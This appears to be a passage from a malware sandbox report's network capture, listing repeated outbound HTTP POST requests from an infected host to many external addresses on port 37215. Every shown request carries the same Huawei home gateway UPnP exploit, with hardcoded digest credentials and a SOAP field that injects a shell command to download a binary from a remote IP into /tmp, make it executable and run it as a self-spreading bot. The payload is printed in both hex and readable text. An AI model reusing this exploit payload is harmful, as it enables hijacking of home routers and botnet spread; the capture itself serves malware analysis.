                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2132192.168.2.1359756197.138.87.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.586950064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2133192.168.2.1341482157.156.118.24637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.589036942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2134192.168.2.1340752197.173.68.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.589037895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2135192.168.2.1342968152.207.161.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.589114904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2136192.168.2.1343528197.191.40.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.589127064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2137192.168.2.1359272157.129.32.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.589143038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2138192.168.2.134578480.240.175.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.589247942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2139192.168.2.1337274157.94.107.2237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.589262962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2140192.168.2.1360578206.68.107.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.589274883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2141192.168.2.1337428157.98.89.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.589302063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 